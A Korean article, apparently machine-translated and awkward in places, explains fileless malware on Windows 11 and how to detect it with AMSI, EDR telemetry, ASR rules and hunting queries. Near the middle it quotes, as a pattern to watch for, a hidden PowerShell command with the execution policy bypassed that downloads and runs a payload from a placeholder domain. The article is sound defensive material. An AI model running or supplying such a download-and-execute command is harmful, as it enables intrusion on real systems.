Windows 11에서 위험한 파일리스 맬웨어를 감지하는 방법

¿위험한 파일리스 맬웨어를 탐지하는 방법은? 파일리스 공격 활동이 크게 증가했으며 상황을 더욱 악화시키는 것은 Windows 11도 면역이 없습니다이 접근 방식은 디스크를 우회하고 메모리와 합법적인 시스템 도구에 의존합니다. 이 때문에 시그니처 기반 바이러스 백신 프로그램이 제대로 작동하지 않습니다. 신뢰할 수 있는 탐지 방법을 찾고 있다면, 해결책은 다음과 같은 두 가지 방법을 결합하는 것입니다. 원격 측정, 동작 분석 및 Windows 컨트롤.

현재 생태계에서 PowerShell, WMI 또는 Mshta를 남용하는 캠페인은 메모리 주입, 디스크를 "건드리지 않고" 지속성, 심지어는 더 정교한 기술과 공존합니다. 펌웨어 남용핵심은 위협 맵, 공격 단계를 이해하고 모든 일이 RAM 내에서 발생하더라도 어떤 신호를 남기는지 이해하는 것입니다.

파일리스 맬웨어란 무엇이고 Windows 11에서 왜 문제가 되나요?

"파일 없는" 위협에 대해 이야기할 때 우리는 악성 코드를 언급합니다. 새로운 실행 파일을 입금할 필요가 없습니다. 파일 시스템에 저장됩니다. 일반적으로 실행 중인 프로세스에 삽입되어 RAM에서 실행되며, Microsoft에서 서명한 인터프리터와 바이너리(예: PowerShell, WMI, rundll32, mshta이렇게 하면 발자국이 줄어들고 의심스러운 파일만 찾는 검색 엔진을 우회할 수 있습니다.

취약점을 악용하여 명령을 실행하는 사무용 문서나 PDF도 이러한 현상의 일부로 간주됩니다. 메모리에서 실행을 활성화합니다 분석을 위한 유용한 바이너리를 남기지 않고. 남용 매크로와 DDE Office에서는 코드가 WinWord와 같은 합법적인 프로세스에서 실행되기 때문입니다.

공격자는 소셜 엔지니어링(피싱, 스팸 링크)과 기술적 함정을 결합합니다. 즉, 사용자의 클릭으로 스크립트가 메모리에 최종 페이로드를 다운로드하고 실행하는 체인이 시작됩니다. 흔적을 남기지 않기 디스크에 저장됩니다. 목표는 데이터 유출부터 랜섬웨어 실행, 은밀한 측면 이동까지 다양합니다.

시스템 내 발자국에 따른 유형: '순수'에서 하이브리드까지

개념의 혼란을 피하기 위해 파일 시스템과의 상호 작용 정도에 따라 위협을 구분하는 것이 좋습니다. 이러한 분류를 통해 무엇이 지속되고, 코드는 어디에 있으며, 어떤 흔적을 남기나요?.

유형 I: 파일 활동 없음

완전히 파일리스 맬웨어는 디스크에 아무것도 쓰지 않습니다. 전형적인 예로는 네트워크 취약성 (예전의 EternalBlue 벡터처럼) 커널 메모리에 상주하는 백도어를 구현하기 위한 것입니다(DoublePulsar와 같은 경우). 이 경우 모든 작업은 RAM에서 발생하며 파일 시스템에는 아티팩트가 없습니다.

또 다른 옵션은 오염시키는 것입니다. 펌웨어 구성 요소: BIOS/UEFI, 네트워크 어댑터, USB 주변 장치(BadUSB 유형 기술) 또는 CPU 하위 시스템. 이러한 문제는 재시작 및 재설치를 통해 지속되며, 추가적인 어려움도 있습니다. 펌웨어를 검사하는 제품은 거의 없습니다.이러한 공격은 복잡하고 빈도는 낮지만 은밀하고 내구성이 뛰어나 위험합니다.

유형 II: 간접 보관 활동

여기서 맬웨어는 자체 실행 파일을 "남기지" 않고, 기본적으로 파일로 저장되는 시스템 관리 컨테이너를 사용합니다. 예를 들어, 파워쉘 명령어 WMI 저장소에 저장하고 이벤트 필터를 사용하여 실행을 트리거합니다. 바이너리를 삭제하지 않고 명령줄에서 설치할 수 있지만, WMI 저장소는 디스크에 합법적인 데이터베이스로 상주하기 때문에 시스템에 영향을 주지 않고 정리하기가 어렵습니다.

실용적인 관점에서 보면, 컨테이너(WMI, 레지스트리 등)가 파일이 없는 것으로 간주됩니다. 이는 고전적인 감지 가능한 실행 파일이 아닙니다. 그리고 그 정화 작업은 결코 쉬운 일이 아닙니다. 그 결과, "전통적인" 흔적이 거의 남지 않은 은밀한 지속성이 확보되었습니다.

유형 III: 작동하려면 파일이 필요합니다.

일부 사례에서는 다음을 유지합니다. '파일리스' 지속성 논리적 수준에서는 파일 기반 트리거가 필요합니다. 대표적인 예가 Kovter입니다. Kovter는 임의의 확장자에 대한 셸 동사를 등록합니다. 해당 확장자를 가진 파일이 열리면 mshta.exe를 사용하는 작은 스크립트가 실행되어 레지스트리에서 악성 문자열을 재구성합니다.

비결은 무작위 확장자를 가진 이러한 "미끼" 파일에는 분석 가능한 페이로드가 포함되어 있지 않으며 대부분의 코드가 다음 위치에 있다는 것입니다. 등록 (다른 컨테이너). 엄밀히 말하면 하나 이상의 디스크 아티팩트를 트리거로 사용함에도 불구하고, 영향 측면에서 파일리스로 분류되는 이유입니다.

감염의 매개체와 '숙주': 감염이 들어오는 곳과 숨는 곳

탐지율을 높이려면 감염의 진입 지점과 숙주를 파악하는 것이 중요합니다. 이러한 관점은 특정 컨트롤 적절한 원격 측정을 우선시합니다.

악용

• 파일 기반 (유형 III): 문서, 실행 파일, 레거시 Flash/Java 파일 또는 LNK 파일은 브라우저나 이를 처리하는 엔진을 악용하여 셸코드를 메모리에 로드할 수 있습니다. 첫 번째 벡터는 파일이지만, 페이로드는 RAM으로 이동합니다.
• 네트워크 기반 (유형 I): 취약점(예: SMB)을 악용하는 패키지가 사용자 영역이나 커널에서 실행됩니다. WannaCry는 이러한 접근 방식을 대중화했습니다. 직접 메모리 로드 새로운 파일 없이.

하드웨어

• 장치 (유형 I): 디스크 또는 네트워크 카드 펌웨어를 변경하고 코드를 삽입할 수 있습니다. 검사가 어렵고 OS 외부에서 지속됩니다.
• CPU 및 관리 하위 시스템 (유형 I): Intel의 ME/AMT와 같은 기술은 다음과 같은 경로를 보여주었습니다. OS 외부의 네트워킹 및 실행매우 낮은 수준에서 공격하지만, 은밀하게 움직일 가능성이 매우 높습니다.
• USB (유형 I): BadUSB를 사용하면 USB 드라이브를 재프로그래밍하여 키보드나 NIC를 가장하고 명령을 실행하거나 트래픽을 리디렉션할 수 있습니다.
• BIOS / UEFI (유형 I): Windows가 부팅되기 전에 실행되는 악성 펌웨어 재프로그래밍(Mebromi와 같은 사례).
• 하이퍼 바이저 (유형 I): OS 아래에 미니 하이퍼바이저를 구현하여 그 존재를 은폐합니다. 드물지만, 하이퍼바이저 루트킷 형태로 이미 발견되었습니다.

실행 및 주입

• 파일 기반 (유형 III): 합법적인 프로세스에 주입을 시작하는 EXE/DLL/LNK 또는 예약된 작업.
• 매크로 (유형 III): Office의 VBA는 사용자의 동의를 얻어 사기를 통해 전체 랜섬웨어를 포함한 페이로드를 디코딩하고 실행할 수 있습니다.
• 스크립트 (유형 II): 파일, 명령줄에서 PowerShell, VBScript 또는 JScript 서비스, ​​등록 또는 WMI공격자는 디스크를 건드리지 않고도 원격 세션에서 스크립트를 입력할 수 있습니다.
• 부트 레코드(MBR/부트) (유형 II): Petya와 같은 악성코드는 부팅 시 부트 섹터를 덮어써서 제어권을 장악합니다. 부트 섹터는 파일 시스템 외부에 있지만, OS와 이를 복구할 수 있는 최신 솔루션에서는 접근할 수 있습니다.

파일리스 공격의 작동 방식: 단계 및 신호

실행 파일은 남기지 않지만, 캠페인은 단계적 논리를 따릅니다. 이를 이해하면 모니터링이 가능합니다. 이벤트 및 프로세스 간 관계 흔적을 남기는 것들.

• 초기 접근링크나 첨부 파일, 손상된 웹사이트 또는 도용된 사용자 인증 정보를 사용하는 피싱 공격입니다. 많은 공격 유형이 명령을 트리거하는 Office 문서로 시작됩니다. PowerShell을.
• 고집: WMI를 통한 백도어(필터 및 구독) 레지스트리 실행 키 또는 새로운 악성 파일 없이 스크립트를 다시 시작하는 예약된 작업입니다.
• 탈출정보가 수집되면 신뢰할 수 있는 프로세스(브라우저, PowerShell, bitsadmin)를 사용하여 네트워크 외부로 전송하여 트래픽을 혼합합니다.

이 패턴은 특히 다음과 같은 이유로 교활합니다. 공격 지표 이러한 취약점은 명령줄 인수, 프로세스 체이닝, 비정상적인 아웃바운드 연결 또는 주입 API 액세스 등 정상적인 상황에서 발견됩니다.

일반적인 기술: 기억에서 기록까지

배우들은 다양한 것에 의존합니다 방법 은밀성을 최적화하는 것들입니다. 효과적인 탐지를 활성화하려면 가장 일반적인 것들을 아는 것이 좋습니다.

• 기억 속에 거주하다: 활성화를 기다리는 신뢰할 수 있는 프로세스의 공간에 페이로드를 로드합니다. 루트킷과 후크 커널에서는 은폐 수준을 높입니다.
• 레지스트리의 지속성암호화된 블롭을 키에 저장하고 합법적인 런처(mshta, rundll32, wscript)에서 다시 활성화하세요. 임시 설치 프로그램은 설치 공간을 최소화하기 위해 자체 삭제될 수 있습니다.
• 자격 증명 피싱공격자는 도난당한 사용자 이름과 비밀번호를 사용하여 원격 셸과 플랜트를 실행합니다. 조용한 접근 레지스트리나 WMI에서.
• '파일리스' 랜섬웨어암호화와 C2 통신은 RAM에서 조정되므로 손상이 눈에 띄기 전까지는 감지 가능성이 줄어듭니다.
• 작동 키트: 사용자가 클릭한 후 취약점을 감지하고 메모리 전용 페이로드를 배포하는 자동화된 체인입니다.
• 코드가 있는 문서: 실행 파일을 디스크에 저장하지 않고 명령을 트리거하는 DDE와 같은 매크로 및 메커니즘입니다.

산업 연구에서는 이미 주목할 만한 정점을 보여주었습니다. 2018년 한 기간에는 90% 이상 증가 스크립트 기반 공격과 PowerShell 체인 공격에서 이 벡터가 효과적이기 때문에 선호된다는 신호입니다.

기업과 공급업체의 과제: 차단만으로는 충분하지 않은 이유

PowerShell을 비활성화하거나 매크로를 영구적으로 금지하는 것은 유혹적일 수 있지만 당신은 작업을 중단할 것입니다PowerShell은 현대 관리의 기둥이고 Office는 비즈니스에 필수적입니다. 맹목적으로 차단하는 것은 종종 불가능합니다.

또한 기본 제어를 우회하는 방법이 있습니다. DLL 및 rundll32를 통해 PowerShell을 실행하고 스크립트를 EXE로 패키징하는 것입니다. PowerShell 사본을 직접 가져오세요 또는 이미지에 스크립트를 숨겨 메모리에 추출할 수도 있습니다. 따라서 도구의 존재를 부인하는 것만으로 방어할 수 없습니다.

또 다른 일반적인 실수는 전체 결정을 클라우드에 위임하는 것입니다. 에이전트가 서버로부터 응답을 기다려야 하는 경우, 실시간 예방이 손실됩니다원격 측정 데이터를 업로드하여 정보를 풍부하게 할 수 있지만 완화는 종료 지점에서 발생해야 합니다..

Windows 11에서 파일리스 맬웨어를 감지하는 방법: 원격 측정 및 동작

승리 전략은 프로세스 및 메모리 모니터링파일이 아닙니다. 악의적인 행동은 파일 형태보다 더 안정적이기 때문에 예방 엔진에 적합합니다.

• AMSI(Antimalware Scan Interface)PowerShell, VBScript 또는 JScript 스크립트가 메모리에서 동적으로 생성되는 경우에도 가로채기합니다. 실행 전에 난독화된 문자열을 캡처하는 데 매우 유용합니다.
• 프로세스 모니터링: 시작/종료, PID, 부모 및 자식, 경로, 명령줄 그리고 해시와 실행 트리를 통해 전체 스토리를 이해할 수 있습니다.
• 기억 분석: 디스크를 건드리지 않고 주입, 반사 또는 PE 부하를 감지하고, 비정상적인 실행 영역을 검토합니다.
• 스타터 섹터 보호: 변조 발생 시 MBR/EFI의 제어 및 복구.

Microsoft 생태계에서 Defender for Endpoint는 AMSI를 결합합니다. 행동 모니터링메모리 스캐닝과 클라우드 기반 머신러닝을 활용하여 새로운 변종이나 난독화된 변종에 대한 탐지 범위를 확장합니다. 다른 공급업체들도 커널 상주 엔진을 통해 유사한 접근 방식을 사용합니다.

상관관계의 현실적인 예: 문서에서 PowerShell로

Outlook에서 첨부 파일을 다운로드하고, Word에서 문서를 열고, 액티브 콘텐츠가 활성화되고, PowerShell이 ​​의심스러운 매개변수로 실행되는 상황을 상상해 보세요. 적절한 원격 분석은 명령 줄 (예: ExecutionPolicy 우회, 숨겨진 창) 신뢰할 수 없는 도메인에 연결하여 AppData에 자체를 설치하는 자식 프로세스를 생성합니다.

로컬 컨텍스트를 갖춘 에이전트는 다음을 수행할 수 있습니다. 정지 및 후진 수동 개입 없이 악의적인 활동을 감지하고 SIEM 또는 이메일/SMS를 통해 이를 알립니다. 일부 제품은 근본 원인 속성 계층(StoryLine 유형 모델)을 추가하여 눈에 보이는 프로세스(Outlook/Word)가 아닌 전체 악성 스레드 그리고 그 기원은 시스템을 전면적으로 정화하는 것입니다.

주의해야 할 일반적인 명령 패턴은 다음과 같습니다. powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');논리는 정확한 문자열이 아니지만 신호 집합: 정책 우회, 숨겨진 창, 다운로드 지우기 및 메모리 내 실행.

AMSI, 파이프라인 및 각 행위자의 역할: 엔드포인트에서 SOC까지

스크립트 캡처를 넘어, 견고한 아키텍처는 조사와 대응을 용이하게 하는 단계를 조율합니다. 작업을 실행하기 전에 증거가 많을수록 좋습니다.더 나은

• 스크립트 가로채기AMSI는 악성 소프트웨어 파이프라인에서 정적 및 동적 분석을 위해 콘텐츠(즉석에서 생성된 콘텐츠 포함)를 제공합니다.
• 프로세스 이벤트PID, 바이너리, 해시, 경로 및 기타 데이터가 수집됩니다. 인수최종 로드로 이어지는 프로세스 트리를 구축합니다.
• 탐지 및 보고탐지된 내용은 제품 콘솔에 표시되고 캠페인 시각화를 위해 네트워크 플랫폼(NDR)으로 전달됩니다.
• 사용자 보증스크립트가 메모리에 삽입되더라도 프레임워크는 AMSI가 가로채다 호환되는 Windows 버전에서.
• 관리자 기능: 스크립트 검사를 활성화하기 위한 정책 구성 행동 기반 차단 콘솔에서 보고서를 생성합니다.
• SOC 작업: 아티팩트(VM UUID, OS 버전, 스크립트 유형, 개시 프로세스 및 해당 부모, 해시 및 명령줄)를 추출하여 기록을 다시 생성합니다. 리프트 규칙 미래.

플랫폼에서 내보내기가 허용되는 경우 메모리 버퍼 실행과 관련하여 연구자들은 새로운 탐지 방법을 생성하고 유사한 변종에 대한 방어력을 강화할 수 있습니다.

Windows 11의 실용적인 조치: 예방 및 사냥

메모리 검사 및 AMSI를 갖춘 EDR 외에도 Windows 11을 사용하면 공격 공간을 닫고 가시성을 향상시킬 수 있습니다. 네이티브 컨트롤.

• PowerShell의 등록 및 제한 사항스크립트 블록 로깅 및 모듈 로깅을 활성화하고 가능한 경우 제한된 모드를 적용하며 사용을 제어합니다. 우회/숨김.
• 공격 표면 감소(ASR) 규칙: Office 프로세스에서 스크립트 시작을 차단합니다. WMI 남용필요하지 않을 때는 /PSExec를 사용합니다.
• 사무실 매크로 정책: 기본적으로 내부 매크로 서명 및 엄격한 신뢰 목록을 비활성화합니다. 레거시 DDE 흐름을 모니터링합니다.
• WMI 감사 및 레지스트리: 이벤트 구독 및 자동 실행 키(Run, RunOnce, Winlogon)와 작업 생성을 모니터링합니다. 예정.
• 시동 보호: 보안 부팅을 활성화하고, MBR/EFI 무결성을 확인하고, 시작 시 수정 사항이 없는지 확인합니다.
• 패치 및 경화: 브라우저, Office 구성 요소 및 네트워크 서비스의 악용 가능한 취약점을 해결합니다.
• 의식: 피싱 및 신호에 대한 사용자 및 기술 팀 교육 비밀 처형.

사냥을 위해 다음에 대한 쿼리에 집중하세요: PowerShell/MSHTA를 향한 Office 프로세스 생성, 인수 다운로드 문자열/다운로드 파일명확한 난독화, 반사적 주입, 그리고 의심스러운 최상위 도메인(TLD)으로의 아웃바운드 네트워크가 포함된 스크립트. 이러한 신호를 평판 및 빈도와 교차 참조하여 노이즈를 줄이세요.

오늘날 각 엔진은 무엇을 감지할 수 있나요?

Microsoft의 엔터프라이즈 솔루션은 AMSI, 행동 분석을 결합합니다. 기억을 조사하다 부트 섹터 보호, 클라우드 기반 ML 모델을 통해 새로운 위협에 대응할 수 있는 확장성을 제공합니다. 다른 공급업체들은 커널 수준 모니터링을 구현하여 악성 소프트웨어와 정상 소프트웨어를 구분하고 변경 사항을 자동으로 롤백합니다.

기반 접근 방식 처형 이야기 이를 통해 근본 원인(예: 체인을 트리거하는 Outlook 첨부 파일)을 식별하고 스크립트, 키, 작업, 중간 바이너리 등 전체 트리를 완화하여 눈에 보이는 증상에 갇히는 것을 방지할 수 있습니다.

흔히 발생하는 실수와 이를 방지하는 방법

대체 관리 계획 없이 PowerShell을 차단하는 것은 비실용적일 뿐만 아니라 간접적으로 호출하는 방법매크로에도 동일하게 적용됩니다. 정책과 서명을 통해 관리하지 않으면 비즈니스에 큰 타격을 입힐 것입니다. 원격 분석과 행동 규칙에 집중하는 것이 좋습니다.

또 다른 흔한 실수는 애플리케이션을 허용 목록에 추가하면 모든 문제가 해결된다고 믿는 것입니다. 파일리스 기술은 바로 이 점에 의존합니다. 신뢰할 수 있는 앱통제는 그들이 무엇을 하는지, 어떻게 관련되어 있는지를 관찰해야지, 그들이 허용되는지 여부를 관찰해서는 안 됩니다.

위의 모든 사항을 고려하면, 실제로 중요한 사항을 모니터링하면 파일리스 맬웨어는 더 이상 "유령"이 아닙니다. 행동, 기억, 그리고 기원 각 실행에 대해. AMSI, 풍부한 프로세스 원격 분석, 기본 Windows 11 컨트롤, 그리고 동작 분석 기능이 포함된 EDR 계층을 결합하면 이점을 얻을 수 있습니다. 여기에 매크로 및 PowerShell에 대한 현실적인 정책, WMI/레지스트리 감사, 그리고 명령줄과 프로세스 트리를 우선시하는 헌팅을 추가하면 문제가 발생하기 전에 이러한 사슬을 끊어내는 방어 체계를 갖추게 됩니다.